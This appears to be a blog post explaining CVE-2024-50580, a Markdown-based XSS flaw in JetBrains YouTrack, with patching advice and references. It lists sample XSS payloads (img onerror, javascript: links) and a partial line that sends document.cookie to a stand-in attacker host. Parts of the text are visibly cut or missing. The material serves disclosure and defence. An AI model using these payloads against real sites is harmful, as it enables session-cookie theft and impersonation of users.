JetBrains YouTrack is a popular issue tracking and project management tool, widely used by teams for managing bugs and project workflows. However, in versions before 2024.3.47707, a critical vulnerability was discovered — CVE-2024-50580 — that could allow attackers to perform multiple Cross-Site Scripting (XSS) attacks using Markdown. This post takes you through the vulnerability, offers a code snippet to demonstrate the exploit, and helps you understand how it works, with references for further reading.
What is CVE-2024-50580?
CVE-2024-50580 is a set of vulnerabilities in JetBrains YouTrack (before version 2024.3.47707) that allow attackers to execute arbitrary JavaScript in the context of the user’s web browser. The flaws stemmed from how YouTrack parsed and rendered Markdown content. An attacker could create specially crafted Markdown, embed it in comments or descriptions, and have it executed when a user viewed the page.
Root Cause: Insecure Markdown Parsing
Markdown is a lightweight markup language that lets users format text without HTML. Unfortunately, when Markdown is parsed without strict security rules, it can be abused for XSS. YouTrack’s older versions didn’t sanitize certain Markdown constructions, particularly those involving:
Here’s an oversimplified example of buggy Markdown parsing in pseudo-code
fun renderMarkdown(input: String): String {
// Problem: Simply converting Markdown to HTML
return SomeMarkdownParser.toHtml(input)
// No sanitation of dangerous HTML
}
If user input is rendered without any sanitation, attackers can insert HTML/JavaScript into issue descriptions or comments.
Custom Rendering Gone Wrong
YouTrack also provided custom rendering rules — for example, for quoting issues or adding specific references. However, these custom rules did not always sanitize embedded data, allowing XSS to sneak through even special widgets or custom macros.
An attacker could exploit this by crafting Markdown that, when combined with custom rules, output dangerous HTML.
This is where things turn scary. Here’s a minimal example an attacker could insert
![XSS](x onerror="alert('XSS')")
Or, using inline HTML directly in Markdown (if allowed)
<img src=x onerror="alert('CVE-2024-50580')">
Or, with an unsafe link
[Malicious Link](javascript:alert('Gotcha!'))
Just paste this in a YouTrack comment or description
<img src="doesnotexist" onerror="alert('CVE-2024-50580 XSS')">
Whenever a user with sufficient privileges views this issue/comment, the JavaScript alert is triggered. The attacker could, of course, steal cookies or perform actions as the user.
Let’s walk through an example
1. Attacker creates a YouTrack account or leverages a guest account (depending on instance’s settings).
`markdown
https://attacker-site.com/steal?cookie=' + document.cookie)">
Victim (could be a project manager or team member) visits the issue page.
4. Their browser executes the malicious code. The attacker could now steal session cookies, perform CSRF attacks, or impersonate the victim.
Note: Even *read-only* users could trigger scripts if Markdown wasn’t sanitized at render time.
Apply secure custom rendering rules.
If you are running YouTrack (on-premise/self-hosted), update immediately to the latest version! See JetBrains’ release notes for further details.
Original References
- JetBrains Security Advisory: YT-2024-05
- NVD CVE Entry - CVE-2024-50580
- Common XSS Patterns in Markdown
- JetBrains YouTrack Releases
Conclusion
CVE-2024-50580 is a classic example of why Markdown parsing needs to be locked down, especially in products where users can submit content that will be viewed by others. Custom rendering rules are equally dangerous if not properly sanitized. The bug’s fix is simple: sanitize *everything*.
If you’re using YouTrack before 2024.3.47707, update right now or risk being XSS’d.
*Stay safe, patch your systems, and monitor for further security advisories. If you have questions or want to see more detailed exploit scenarios, leave a comment below!*
Timeline
Published on: 10/28/2024 13:15:09 UTC
Last modified on: 10/29/2024 17:17:29 UTC